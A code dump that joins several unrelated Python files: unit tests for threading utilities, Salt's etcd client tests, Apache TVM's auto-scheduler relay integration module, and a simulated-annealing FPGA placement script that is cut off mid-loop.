self.assertEqual(3, i.get_and_add(3))
self.assertEqual(6, i.get_and_add(4))
self.assertEqual(10, i.get_and_add(0))
self.assertEqual(10, i.get_and_set(-1))
self.assertEqual(-1, i.get_and_set(2))
self.assertEqual(2, i.get_and_set(0))
def test_atomic_set(self):
s = utils.AtomicSet()
self.assertFalse('x' in s)
self.assertFalse(s.check_and_add('x'))
self.assertTrue('x' in s)
self.assertFalse(s.check_and_add('y'))
self.assertTrue('y' in s)
def test_priority(self):
with self.assertRaises(AssertionError):
utils.Priority([]) # Non-hashable!
eq = self.assertEqual
lt = self.assertLess
gt = self.assertGreater
test_data = [
(eq, utils.Priority.LOWEST, utils.Priority.LOWEST),
(gt, utils.Priority.LOWEST, utils.Priority('x')),
(gt, utils.Priority.LOWEST, utils.Priority.HIGHEST),
(eq, utils.Priority('x'), utils.Priority('x')),
(lt, utils.Priority('x'), utils.Priority('y')),
(gt, utils.Priority('x'), utils.Priority('w')),
(lt, utils.Priority('x'), utils.Priority.LOWEST),
(gt, utils.Priority('x'), utils.Priority.HIGHEST),
(eq, utils.Priority.HIGHEST, utils.Priority.HIGHEST),
(lt, utils.Priority.HIGHEST, utils.Priority('x')),
(lt, utils.Priority.HIGHEST, utils.Priority.LOWEST),
]
for assertion, left, right in test_data:
assertion(left, right)
if assertion is eq:
self.assertEqual(hash(left), hash(right))
else:
self.assertNotEqual(hash(left), hash(right))
def test_priority_with_heap(self):
def heapsort(iterable):
heap = []
for value in iterable:
heapq.heappush(heap, value)
return [heapq.heappop(heap) for _ in range(len(heap))]
random.seed(4)
for expect in (
[],
[utils.Priority(0)],
[utils.Priority.HIGHEST],
[utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1)],
[utils.Priority(0), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0)],
[utils.Priority.HIGHEST, utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1), utils.Priority(2)],
[utils.Priority(0), utils.Priority(1), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0), utils.Priority(1)],
[
utils.Priority.HIGHEST,
utils.Priority(0),
utils.Priority.LOWEST,
],
):
actual = list(expect)
random.shuffle(actual)
actual = heapsort(actual)
self.assertListEqual(expect, actual)
actual = heapsort((reversed(expect)))
self.assertListEqual(expect, actual)
def test_generate_names(self):
names = utils.generate_names(name='hello')
self.assertEqual('hello-01', next(names))
self.assertEqual('hello-02', next(names))
self.assertEqual('hello-03', next(names))
names = utils.generate_names(
name_format='{string}-{serial}',
string='hello',
serial=utils.AtomicInt(0))
self.assertEqual('hello-0', next(names))
self.assertEqual('hello-1', next(names))
self.assertEqual('hello-2', next(names))
def test_make_get_thread_local(self):
# They should access the same 'x'
get_x_1 = utils.make_get_thread_local(
'x', lambda: threading.current_thread().ident)
get_x_2 = utils.make_get_thread_local(
'x', lambda: self.fail('this should not be called'))
def func(x_output):
x_output.append(get_x_1())
x_output.append(get_x_2())
t1_x = []
t1 = threading.Thread(target=func, args=(t1_x,))
t1.start()
t2_x = []
t2 = threading.Thread(target=func, args=(t2_x,))
t2.start()
t1.join()
t2.join()
self.assertEqual([t1.ident, t1.ident], t1_x)
self.assertEqual([t2.ident, t2.ident], t2_x)
if __name__ == '__main__':
unittest.main()
|
test_etcd_util.py
|
import copy
import logging
import threading
import time
import pytest
from salt.utils.etcd_util import EtcdClient, EtcdClientV3, get_conn
from tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import
pytest.importorskip("docker")
log = logging.getLogger(__name__)
pytestmark = [
pytest.mark.slow_test,
pytest.mark.windows_whitelisted,
pytest.mark.skip_if_binaries_missing("docker", "dockerd", check_all=False),
]
@pytest.fixture(scope="module")
def minion_config_overrides(etcd_profile):
return etcd_profile
@pytest.fixture(scope="module")
def etcd_client(minion_opts, profile_name):
return get_conn(minion_opts, profile=profile_name)
@pytest.fixture(scope="module")
def prefix():
return "/salt/util/test"
@pytest.fixture(autouse=True)
def cleanup_prefixed_entries(etcd_client, prefix):
"""
Cleanup after each test to ensure a consistent starting state.
"""
try:
assert etcd_client.get(prefix, recurse=True) is None
yield
finally:
etcd_client.delete(prefix, recurse=True)
def test_etcd_client_creation(minion_opts, profile_name, etcd_version):
"""
Client creation using client classes, just need to assert no errors.
"""
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
EtcdClient(minion_opts, profile=profile_name)
else:
EtcdClientV3(minion_opts, profile=profile_name)
def test_etcd_client_creation_with_get_conn(minion_opts, profile_name):
"""
Client creation using get_conn, just need to assert no errors.
"""
get_conn(minion_opts, profile=profile_name)
def test_simple_operations(etcd_client, prefix):
"""
Verify basic functionality in order to justify use of the cleanup fixture.
"""
assert not etcd_client.get("{}/mtg/ambush".format(prefix))
assert etcd_client.set("{}/mtg/ambush".format(prefix), "viper") == "viper"
assert etcd_client.get("{}/mtg/ambush".format(prefix)) == "viper"
assert etcd_client.set("{}/mtg/counter".format(prefix), "spell") == "spell"
assert etcd_client.tree("{}/mtg".format(prefix)) == {
"ambush": "viper",
"counter": "spell",
}
assert etcd_client.ls("{}/mtg".format(prefix)) == {
"{}/mtg".format(prefix): {
"{}/mtg/ambush".format(prefix): "viper",
"{}/mtg/counter".format(prefix): "spell",
},
}
assert etcd_client.delete("{}/mtg/ambush".format(prefix))
assert etcd_client.delete("{}/mtg".format(prefix), recurse=True)
assert not etcd_client.get("{}/mtg".format(prefix), recurse=True)
def test_simple_operations_with_raw_keys_and_values(
minion_opts, profile_name, prefix, etcd_version
):
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
pytest.skip("Not testing with raw keys using v2")
modified_opts = copy.deepcopy(minion_opts)
modified_opts[profile_name]["etcd.raw_keys"] = True
modified_opts[profile_name]["etcd.raw_values"] = True
etcd_client = get_conn(modified_opts, profile=profile_name)
assert not etcd_client.get("{}/mtg/ambush".format(prefix))
assert etcd_client.set("{}/mtg/ambush".format(prefix), "viper") == b"viper"
assert etcd_client.get("{}/mtg/ambush".format(prefix)) == b"viper"
assert etcd_client.set("{}/mtg/counter".format(prefix), "spell") == b"spell"
assert etcd_client.tree("{}/mtg".format(prefix)) == {
b"ambush": b"viper",
b"counter": b"spell",
}
assert etcd_client.ls("{}/mtg".format(prefix)) == {
"{}/mtg".format(prefix).encode("UTF-8"): {
"{}/mtg/ambush".format(prefix).encode("UTF-8"): b"viper",
"{}/mtg/counter".format(prefix).encode("UTF-8"): b"spell",
},
}
assert etcd_client.delete("{}/mtg/ambush".format(prefix))
assert etcd_client.delete("{}/mtg".format(prefix), recurse=True)
assert not etcd_client.get("{}/mtg".format(prefix), recurse=True)
def test_get(subtests, etcd_client, prefix):
"""
Test that get works as intended.
"""
# Test general get case with key=value
with subtests.test("inserted keys should be able to be retrieved"):
etcd_client.set("{}/get-test/key".format(prefix), "value")
assert etcd_client.get("{}/get-test/key".format(prefix)) == "value"
# Test with recurse=True.
with subtests.test("keys should be able to be retrieved recursively"):
etcd_client.set("{}/get-test/key2/subkey".format(prefix), "subvalue")
etcd_client.set("{}/get-test/key2/subkey2/1".format(prefix), "subvalue1")
etcd_client.set("{}/get-test/key2/subkey2/2".format(prefix), "subvalue2")
expected = {
"subkey": "subvalue",
"subkey2": {
"1": "subvalue1",
"2": "subvalue2",
},
}
assert (
etcd_client.get("{}/get-test/key2".format(prefix), recurse=True) == expected
)
def test_read(subtests, etcd_client, prefix, etcd_version):
"""
Test that we are able to read and wait.
"""
etcd_client.set("{}/read/1".format(prefix), "one")
etcd_client.set("{}/read/2".format(prefix), "two")
etcd_client.set("{}/read/3/4".format(prefix), "three/four")
# Simple read test
with subtests.test(
"reading a newly inserted and existent key should return that key"
):
result = etcd_client.read("{}/read/1".format(prefix))
assert result
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
assert result.value == "one"
else:
assert result.pop().value == "one"
# Recursive read test
with subtests.test(
"reading recursively should return a dictionary starting at the given key"
):
expected = etcd_client._flatten(
{
"1": "one",
"2": "two",
"3": {"4": "three/four"},
},
path="{}/read".format(prefix),
)
result = etcd_client.read("{}/read".format(prefix), recurse=True)
assert result
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
assert result.children
else:
assert len(result) > 1
result_dict = {}
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
for child in result.children:
result_dict[child.key] = child.value
else:
for child in result:
if child.key != "{}/read".format(prefix):
result_dict[child.key] = child.value
assert result_dict == expected
# Wait for an update
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_client.read("{}/read/1".format(prefix), wait=True, timeout=30)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "not one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "not one"
# Wait for an update using recursive
with subtests.test("nested updates should be catchable"):
return_list = []
def wait_func_2(return_list):
return_list.append(
etcd_client.read(
"{}/read".format(prefix), wait=True, timeout=30, recurse=True
)
)
wait_thread = threading.Thread(target=wait_func_2, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one again!")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one again!"
# Wait for an update after last modification
with subtests.test(
"updates should be able to be caught after an index by waiting in read"
):
return_list = []
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
last_modified = modified.modifiedIndex
else:
last_modified = modified.mod_revision
def wait_func_3(return_list):
return_list.append(
etcd_client.read(
"{}/read/1".format(prefix),
wait=True,
timeout=30,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_3, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one"
# Wait for an update after last modification, recursively
with subtests.test("nested updates after index should be catchable"):
return_list = []
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
last_modified = modified.modifiedIndex
else:
last_modified = modified.mod_revision
def wait_func_4(return_list):
return_list.append(
etcd_client.read(
"{}/read".format(prefix),
wait=True,
timeout=30,
recurse=True,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_4, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one"
def test_update(subtests, etcd_client, prefix):
"""
Ensure that we can update fields
"""
etcd_client.set("{}/read/1".format(prefix), "one")
etcd_client.set("{}/read/2".format(prefix), "two")
etcd_client.set("{}/read/3/4".format(prefix), "three/four")
# Update existent fields
with subtests.test("update should work on already existent field"):
updated = {
"{}/read/1".format(prefix): "not one",
"{}/read/2".format(prefix): "not two",
}
assert etcd_client.update(updated) == updated
assert etcd_client.get("{}/read/1".format(prefix)) == "not one"
assert etcd_client.get("{}/read/2".format(prefix)) == "not two"
# Update non-existent fields
with subtests.test("update should work on non-existent fields"):
updated = {
prefix: {
"read-2": "read-2",
"read-3": "read-3",
"read-4": {
"sub-4": "subvalue-1",
"sub-4-2": "subvalue-2",
},
}
}
assert etcd_client.update(updated) == etcd_client._flatten(updated)
assert etcd_client.get("{}/read-2".format(prefix)) == "read-2"
assert etcd_client.get("{}/read-3".format(prefix)) == "read-3"
assert (
etcd_client.get("{}/read-4".format(prefix), recurse=True)
== updated[prefix]["read-4"]
)
with subtests.test("we should be able to prepend a path within update"):
updated = {
"1": "path updated one",
"2": "path updated two",
}
expected_return = {
"{}/read/1".format(prefix): "path updated one",
"{}/read/2".format(prefix): "path updated two",
}
assert (
etcd_client.update(updated, path="{}/read".format(prefix))
== expected_return
)
assert etcd_client.get("{}/read/1".format(prefix)) == "path updated one"
assert etcd_client.get("{}/read/2".format(prefix)) == "path updated two"
def test_write_file(subtests, etcd_client, prefix):
"""
Test solely writing files
"""
with subtests.test(
"we should be able to write a single value for a non-existent key"
):
assert (
etcd_client.write_file("{}/write/key_1".format(prefix), "value_1")
== "value_1"
)
assert etcd_client.get("{}/write/key_1".format(prefix)) == "value_1"
with subtests.test("we should be able to write a single value for an existent key"):
assert (
etcd_client.write_file("{}/write/key_1".format(prefix), "new_value_1")
== "new_value_1"
)
assert etcd_client.get("{}/write/key_1".format(prefix)) == "new_value_1"
with subtests.test("we should be able to write a single value with a ttl"):
assert (
etcd_client.write_file(
"{}/write/ttl_key".format(prefix), "new_value_2", ttl=5
)
== "new_value_2"
)
time.sleep(10)
assert etcd_client.get("{}/write/ttl_key".format(prefix)) is None
def test_write_directory(subtests, etcd_client, prefix, etcd_version):
"""
Test solely writing directories
"""
if etcd_version != EtcdVersion.v2:
pytest.skip("write_directory is not defined for etcd v3")
with subtests.test("we should be able to create a non-existent directory"):
assert etcd_client.write_directory("{}/write_dir/dir1".format(prefix), None)
assert etcd_client.get("{}/write_dir/dir1".format(prefix)) is None
with subtests.test("writing an already existent directory should return True"):
assert etcd_client.write_directory("{}/write_dir/dir1".format(prefix), None)
assert etcd_client.get("{}/write_dir/dir1".format(prefix)) is None
with subtests.test("we should be able to write to a new directory"):
assert (
etcd_client.write_file("{}/write_dir/dir1/key1".format(prefix), "value1")
== "value1"
)
assert etcd_client.get("{}/write_dir/dir1/key1".format(prefix)) == "value1"
def test_ls(subtests, etcd_client, prefix):
"""
Test listing top level contents
"""
with subtests.test("ls on a non-existent directory should return an empty dict"):
assert not etcd_client.ls("{}/ls".format(prefix))
with subtests.test(
"ls should list the top level keys and values at the given path"
):
etcd_client.set("{}/ls/1".format(prefix), "one")
etcd_client.set("{}/ls/2".format(prefix), "two")
etcd_client.set("{}/ls/3/4".format(prefix), "three/four")
# If it's a dir, it's suffixed with a slash
expected = {
"{}/ls".format(prefix): {
"{}/ls/1".format(prefix): "one",
"{}/ls/2".format(prefix): "two",
"{}/ls/3/".format(prefix): {},
},
}
assert etcd_client.ls("{}/ls".format(prefix)) == expected
@pytest.mark.parametrize("func", ("rm", "delete"))
def test_rm_and_delete(subtests, etcd_client, prefix, func, etcd_version):
"""
Ensure we can remove keys using rm
"""
func = getattr(etcd_client, func)
with subtests.test("removing a non-existent key should do nothing"):
assert func("{}/rm/key1".format(prefix)) is None
with subtests.test("we should be able to remove an existing key"):
etcd_client.set("{}/rm/key1".format(prefix), "value1")
assert func("{}/rm/key1".format(prefix))
assert etcd_client.get("{}/rm/key1".format(prefix)) is None
with subtests.test("we should be able to remove an empty directory"):
if etcd_version == EtcdVersion.v2:
etcd_client.write_directory("{}/rm/dir1".format(prefix), None)
assert func("{}/rm/dir1".format(prefix), recurse=True)
assert etcd_client.get("{}/rm/dir1".format(prefix), recurse=True) is None
with subtests.test("we should be able to remove a directory with keys"):
updated = {
"dir1": {
"rm-1": "value-1",
"rm-2": {
"sub-rm-1": "subvalue-1",
"sub-rm-2": "subvalue-2",
},
}
}
etcd_client.update(updated, path="{}/rm".format(prefix))
assert func("{}/rm/dir1".format(prefix), recurse=True)
assert etcd_client.get("{}/rm/dir1".format(prefix), recurse=True) is None
assert etcd_client.get("{}/rm/dir1/rm-1".format(prefix), recurse=True) is None
with subtests.test("removing a directory without recursion should do nothing"):
updated = {
"dir1": {
"rm-1": "value-1",
"rm-2": {
"sub-rm-1": "subvalue-1",
"sub-rm-2": "subvalue-2",
},
}
}
etcd_client.update(updated, path="{}/rm".format(prefix))
assert func("{}/rm/dir1".format(prefix)) is None
assert (
etcd_client.get("{}/rm/dir1".format(prefix), recurse=True)
== updated["dir1"]
)
assert etcd_client.get("{}/rm/dir1/rm-1".format(prefix)) == "value-1"
def test_tree(subtests, etcd_client, prefix, etcd_version):
"""
Tree should return a dictionary representing what is downstream of the prefix.
"""
with subtests.test("the tree of a non-existent key should be None"):
assert etcd_client.tree(prefix) is None
with subtests.test("the tree of an file should be {key: value}"):
etcd_client.set("{}/1".format(prefix), "one")
assert etcd_client.tree("{}/1".format(prefix)) == {"1": "one"}
with subtests.test("the tree of an empty directory should be empty"):
if etcd_version == EtcdVersion.v2:
etcd_client.write_directory("{}/2".format(prefix), None)
assert etcd_client.tree("{}/2".format(prefix)) == {}
with subtests.test("we should be able to recieve the tree of a directory"):
etcd_client.set("{}/3/4".format(prefix), "three/four")
expected = {
"1": "one",
"2": {},
"3": {"4": "three/four"},
}
if etcd_version != EtcdVersion.v2:
expected.pop("2")
assert etcd_client.tree(prefix) == expected
with subtests.test("we should be able to recieve the tree of an outer directory"):
etcd_client.set("{}/5/6/7".format(prefix), "five/six/seven")
expected = {
"6": {"7": "five/six/seven"},
}
assert etcd_client.tree("{}/5".format(prefix)) == expected
def test_watch(subtests, etcd_client, prefix):
updated = {
"1": "one",
"2": "two",
"3": {
"4": "three/four",
},
}
etcd_client.update(updated, path="{}/watch".format(prefix))
with subtests.test("watching an invalid key should timeout and return None"):
assert etcd_client.watch("{}/invalid".format(prefix), timeout=3) is None
with subtests.test(
"watching an valid key with no changes should timeout and return None"
):
assert etcd_client.watch("{}/watch/1".format(prefix), timeout=3) is None
# Wait for an update
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_client.watch("{}/watch/1".format(prefix), timeout=30)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "not one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "not one"
# Wait for an update using recursive
with subtests.test("nested updates should be catchable"):
return_list = []
def wait_func_2(return_list):
return_list.append(
etcd_client.watch("{}/watch".format(prefix), timeout=30, recurse=True)
)
wait_thread = threading.Thread(target=wait_func_2, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one again!")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one again!"
# Wait for an update after last modification
with subtests.test(
"updates should be able to be caught after an index by waiting in read"
):
return_list = []
last_modified = modified["mIndex"]
def wait_func_3(return_list):
return_list.append(
etcd_client.watch(
"{}/watch/1".format(prefix),
timeout=30,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_3, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one"
# Wait for an update after last modification, recursively
with subtests.test("nested updates after index should be catchable"):
return_list = []
last_modified = modified["mIndex"]
def wait_func_4(return_list):
return_list.append(
etcd_client.watch(
"{}/watch".format(prefix),
timeout=30,
recurse=True,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_4, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one"
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import threading
import tvm
from tvm import te, transform
from tvm.te.tensor import ComputeOp, PlaceholderOp
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute + schedule to extract tasks in a relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
with transform.PassContext(opt_level=3):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
def extract_tasks(mod, params, target, target_host=None, hardware_params=None):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(TracingMode.EXTRACT_TASK)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# query the compile engine to get the number of occurrence of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(SearchTask(dag, wkl_key, target, target_host, hardware_params))
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
PREPARE_LAYOUT_REWRITE = 1 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
# The suffix of implementations that use the auto-scheduler in the OpStrategy.
auto_schedule_impl_suffix = ".auto_scheduler"
def auto_schedule_topi(outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: te.Schedule
A topi schedule function
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
key = register_workload_tensors(io_tensors)
# only enable layout rewrite for cpu backend
enable_layout_rewrite = "cpu" in tvm.target.Target.current().keys
env = TracingEnvironment.current
if env is None: # in the final build mode
state = DispatchContext.current.query(tvm.target.Target.current(), key)
if state is None:
return te.create_schedule([x.op for x in outs])
dag = ComputeDAG(io_tensors)
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode == TracingMode.EXTRACT_TASK: # in the task extraction mode
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# todo(merrymercy, minminsun): port layout rewrite
raise NotImplementedError
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
|
SAv3.py
|
#Author: Jaspreet Jhoja
#contact:Jaspreetj@ece.ubc.ca
import random,copy, statistics, timeit, threading, math
from math import *
import numpy as np
import matplotlib.pyplot as plt
import plot as pt
import queue as Queue
print("SIMULATED ANNEALING BASED PLACER")
files = ['cm138a.txt', 'cm150a.txt', 'cm151a.txt', 'cm162a.txt', 'alu2.txt', 'C880.txt',
'e64.txt', 'apex1.txt', 'cps.txt', 'paira.txt', 'pairb.txt', 'apex4.txt']
for i in range(len(files)):
print('['+str(i)+']'+' - '+ files[i])
choice = input("choose files to run")
gui_choice = input("Do you want to see the progress in a GUI? y/n")
#if you want to use custom iterations and temperature, define here
user_iterations = 0
user_temp = 0
#want to run a mix of temperature handlers
hybrid = 0
#for choice in range(len(files)):
for i in range(1):
filename = files[int(choice)]
print(filename)
global nets, nodes, grid, netsn, nodesn, plot_x, plot_y
nets = [] #net details
nodes = {} #store all nodes in a dictionary
grid = [] #stores grid size
netsn = 0 #number of nets
nodesn = 0 #number of nodes
optimum = {}#optimum results
plot_x = []
plot_y = []
old_swap = [None, None]#previously swapped nodes
new_swap = [None, None] #currently proposed moves to swap
## Simulated Annealing variables
current_cost = 0 #initial or current cost
new_cost = 0 #new proposed cost
old_temp = 0 #previous temperature
current_temp = 0 #current or initial temperature
iterations = 0 #iterations
##################### NOTES ###################
#to get sinks for a node
#get nodedata by nodes[number][0]
#get sinks list by nodes[number][1]
#function to read file
def readfile(filename):
global grid, netsn, nodesn, nets, nodes
#split lines to read one by one
lines = open(filename).read().splitlines()
#extract grid
grid = [int(lines[0].split(' ')[-1]),int(lines[0].split(' ')[-2])]
nets = []
#iterate lines, extract number of nets and individual net nodes
for i in range(len(lines)):
if(i==0):
netsn = int(lines[i].split(' ')[-3]) #extract number of nets
nodesn = int(lines[i].split(' ')[0]) #extract number of nodes
#generate coordinates for nodes which we will use for cost eval
coordinates = []
for c in range(grid[0]):
for r in range(grid[1]):
coordinates.append([c,r*2])
#based on number of nodes, create dictionary keys
for each_node in range(grid[0]*grid[1]):
nodes[str(each_node)] = [coordinates[each_node],[]]
else:
#separate the net details and put them in a list
temp = list(filter(None,lines[i].split(' ')[1:]))
if(len(temp)>0):
nets.append(temp)
# associate nodes to their connections
source =temp[0]
sinks = temp[1:]
for each_sink in sinks:
nodes[source][1].append([each_sink])
# for nodes with no sinks, set None as their sink so no arrows emerge from those nodes
for each_node in nodes:
sink_list = nodes[str(each_node)][1]
if(len(sink_list)==0):
nodes[str(each_node)][1].append(None)
#run the read function
readfile(filename)
# select two nodes which have not been repeated in the previous swap
def select_nodes(nodes_dict, previous_swaps):
new_lot = []
while True:
if(len(new_lot)==2):
#check if i am swapping two unoccupied slots
a = new_lot[0]
b = new_lot[1]
coor_a = nodes_dict[a][0][0]
coor_b = nodes_dict[b][0][0]
if(coor_a == None and coor_b == None):
print(new_lot)
new_lot = []
else:
return new_lot
new_node = random.choice([x for x in range(grid[0]*grid[1]) if x not in previous_swaps])
new_lot.append(str(new_node))
# accept moves
def make_swap(nodes_dict,swap):
a = swap[0]
b = swap[1]
coor_a = nodes_dict[a][0]
coor_b = nodes_dict[b][0]
nodes_dict[a][0] = coor_b
nodes_dict[b][0] = coor_a
return(nodes_dict)
#function to calculate cost
def calculate_cost(nodes_dict, nets):
cost = []
for each_net in nets:
net_x = []
net_y = []
dx = 0
dy = 0
for each_node in each_net:
data = nodes_dict[each_node][0]
net_x.append(data[0])
net_y.append(data[1])
#calculate half-perimeter
dx = abs(max(net_x) - min(net_x))
dy = abs(max(net_y) - min(net_y))
cost.append(dx+dy)
return(sum(cost))
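#NOTE: the cost above is the half-perimeter wirelength (HPWL) summed over all nets;
#a hypothetical net placed at (0,0), (2,4) and (1,2) contributes abs(2-0)+abs(4-0) = 6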
#timer function
start_time = timeit.default_timer()
#setup SA
if(user_iterations == 0):
iterations = int(10*((nodesn)**(4/3)))
else:
iterations = user_iterations
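#the default move budget follows the common 10*N**(4/3) annealing heuristic,
#e.g. a hypothetical 100-node netlist gets int(10*100**(4/3)) = 4641 moves per temperature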
initial_cost = calculate_cost(nodes, nets)
sigma = 0 #std dev of cost of accepted solutions
sigma_list = [] #list to store solutions
r_val = []
#set initial temperature
if(user_temp == 0):
for i in range(50):
sigma_node = copy.deepcopy(nodes)
sigma_swap = select_nodes(sigma_node, old_swap)
old_swap = sigma_swap
sigma_node = make_swap(sigma_node, sigma_swap)
temp_cost = calculate_cost(sigma_node, nets)
if(temp_cost<initial_cost):
sigma_list.append(temp_cost)
#calculate the standard deviation of accepted sigma values
sigma = statistics.stdev(sigma_list)
current_temp = 20*sigma
print(initial_cost, current_temp, iterations)
old_swap=[None, None]
#start with simulated annealing
#start plotting
if(gui_choice == "y"):
queue = Queue.Queue()
plot_thread = threading.Thread(target=pt.plotter, args=(queue, ))
plot_thread.start()
#check if cost is being repeated
isrepeating = 0
#record optimum node ever came across
optimum = nodes
while current_temp!=0:
sigma_list = []
for i in range(iterations):
current_cost = calculate_cost(nodes, nets)
